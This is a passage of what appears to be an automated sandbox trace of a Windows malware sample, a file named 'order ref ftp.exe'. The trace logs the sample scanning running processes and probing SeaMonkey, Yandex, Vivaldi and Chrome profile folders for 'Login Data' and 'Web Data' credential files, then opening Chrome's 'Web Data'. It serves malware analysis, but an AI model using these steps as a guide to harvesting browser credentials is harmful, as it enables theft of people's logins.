(_String1="barry_slovenia_won.exe", _String2="firefox.exe") returned -4 [0069.270] _wcsicmp (_String1="C:\\Program Files\\WindowsPowerShell\\livearticle.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="livearticle.exe", _String2="firefox.exe") returned 6 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Windows Journal\\inn_creation.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="inn_creation.exe", _String2="firefox.exe") returned 3 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="demand_sony_leeds.exe", _String2="firefox.exe") returned -2 [0069.270] _wcsicmp (_String1="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="optimize-dressing.exe", _String2="firefox.exe") returned 9 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="order ref ftp.exe", _String2="firefox.exe") returned 9 [0069.270] _wcsicmp (_String1="C:\\Windows\\System32\\taskhostw.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="taskhostw.exe", _String2="firefox.exe") returned 14 [0069.270] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="C:\\Windows\\System32\\backgroundTaskHost.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="backgroundTaskHost.exe", _String2="firefox.exe") returned -4 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.270] _wcsicmp (_String1="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="vbc.exe", _String2="firefox.exe") returned 16 [0069.270] FreeLibrary (hLibModule=0x76ec0000) returned 1 [0069.271] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x199048, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0069.271] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x198808, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.271] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0069.271] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.271] wcscpy (in: _Dest=0x198e38, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.271] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.272] wcscat (in: _Dest=0x198e38, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.272] wcscat (in: _Dest=0x198e38, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" [0069.272] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.272] wcscpy (in: _Dest=0x198c28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.272] wcscat (in: _Dest=0x198c28, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.272] wcscat (in: _Dest=0x198c28, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" [0069.272] wcslen (_String="Mozilla\\SeaMonkey") returned 0x11 [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.272] wcscpy (in: _Dest=0x198a18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.272] wcscat (in: _Dest=0x198a18, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.272] wcscat (in: _Dest=0x198a18, _Source="Mozilla\\SeaMonkey" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey" [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x40 [0069.272] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0xffffffff [0069.272] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x3e [0069.272] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0xffffffff [0069.272] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini")) returned 0xffffffff [0069.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\seamonkey.exe", ulOptions=0x0, samDesired=0x20019, phkResult=0x199270 | out: phkResult=0x199270*=0x0) returned 0x2 [0069.272] ExpandEnvironmentStringsW (in: lpSrc="%programfiles%\\Sea Monkey", lpDst=0x1992d8, nSize=0x104 | out: lpDst="C:\\Program Files (x86)\\Sea Monkey") returned 0x22 [0069.272] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Sea Monkey\\nss3.dll" (normalized: "c:\\program files (x86)\\sea monkey\\nss3.dll")) returned 0xffffffff [0069.273] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1996f8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcslen (_String="Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0x31 [0069.273] wcscpy (in: _Dest=0x1992d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcscat (in: _Dest=0x1992d8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.273] wcscat (in: _Dest=0x1992d8, _Source="Yandex\\YandexBrowser\\User Data\\Default\\Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" [0069.273] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data")) returned 0xffffffff [0069.273] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1996f8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcslen (_String="Vivaldi\\User Data\\Default\\Login Data") returned 0x24 [0069.273] wcscpy (in: _Dest=0x1992d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcscat (in: _Dest=0x1992d8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.273] wcscat (in: _Dest=0x1992d8, _Source="Vivaldi\\User Data\\Default\\Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data" [0069.273] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\vivaldi\\user data\\default\\login data")) returned 0xffffffff [0069.273] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1992d8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcslen (_String="Google\\Chrome\\User Data") returned 0x17 [0069.273] wcscpy (in: _Dest=0x1994e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.273] wcscat (in: _Dest=0x1994e8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.273] wcscat (in: _Dest=0x1994e8, _Source="Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.273] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.273] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 0x681bf0 [0069.275] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.275] wcslen (_String=".") returned 0x1 [0069.275] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.275] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.275] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.275] wcscat (in: _Dest=0x198d64, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\." [0069.275] wcscmp (_String1=".", _String2="..") returned -1 [0069.275] wcscmp (_String1=".", _String2=".") returned 0 [0069.275] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.293] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.293] wcslen (_String="..") returned 0x2 [0069.293] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.293] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.293] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.293] wcscat (in: _Dest=0x198d64, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\.." [0069.293] wcscmp (_String1="..", _String2="..") returned 0 [0069.293] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.293] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.293] wcslen (_String="CertificateTransparency") returned 0x17 [0069.293] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.293] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.293] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.293] wcscat (in: _Dest=0x198d64, _Source="CertificateTransparency" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0069.293] wcscmp (_String1="CertificateTransparency", _String2="..") returned 1 [0069.293] wcscmp (_String1="CertificateTransparency", _String2=".") returned 1 [0069.293] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\web data")) returned 0xffffffff [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x53 [0069.294] wcslen (_String="Login Data") returned 0xa [0069.294] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x53 [0069.294] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\" [0069.294] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data" [0069.294] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\login data")) returned 0xffffffff [0069.294] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.294] wcslen (_String="Crashpad") returned 0x8 [0069.294] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.294] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.294] wcscat (in: _Dest=0x198d64, _Source="Crashpad" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0069.294] wcscmp (_String1="Crashpad", _String2="..") returned 1 [0069.294] wcscmp (_String1="Crashpad", _String2=".") returned 1 [0069.294] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\web data")) returned 0xffffffff [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x44 [0069.294] wcslen (_String="Login Data") returned 0xa [0069.294] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x44 [0069.294] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0069.294] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data" [0069.294] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\login data")) returned 0xffffffff [0069.294] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.294] wcslen (_String="Default") returned 0x7 [0069.294] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.294] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.294] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.295] wcscat (in: _Dest=0x198d64, _Source="Default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0069.295] wcscmp (_String1="Default", _String2="..") returned 1 [0069.295] wcscmp (_String1="Default", _String2=".") returned 1 [0069.295] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data")) returned 0x20 [0069.302] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0069.302] CloseHandle (hObject=0x260) returned 1 [0069.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x197f00, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 77 [0069.303] GetSystemInfo (in: lpSystemInfo=0x453d60 | out: lpSystemInfo=0x453d60*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0069.304] GetVersionExW (in: lpVersionInformation=0x196274*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x2000002, dwMinorVersion=0x81, dwBuildNumber=0x80, dwPlatformId=0xffff935f, szCSDVersion="P") | out: lpVersionInformation=0x196274*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0069.304] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x197f00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0069.304] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x197f00, cbMultiByte=-1, lpWideCharStr=0x8a9950, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 77 [0069.304] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0069.304] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x50, lpBuffer=0x8a99f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpFilePart=0x0) returned 0x4c [0069.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0069.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x8aa908, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 77 [0069.304] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9ab8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0069.304] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9ab8, cbMultiByte=-1, lpWideCharStr=0x8aa6e8, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 77 [0069.304] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0069.305] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9ab8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0069.305] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8a9ab8, cbMultiByte=-1, lpWideCharStr=0x8aa790, cchWideChar=77 | out: 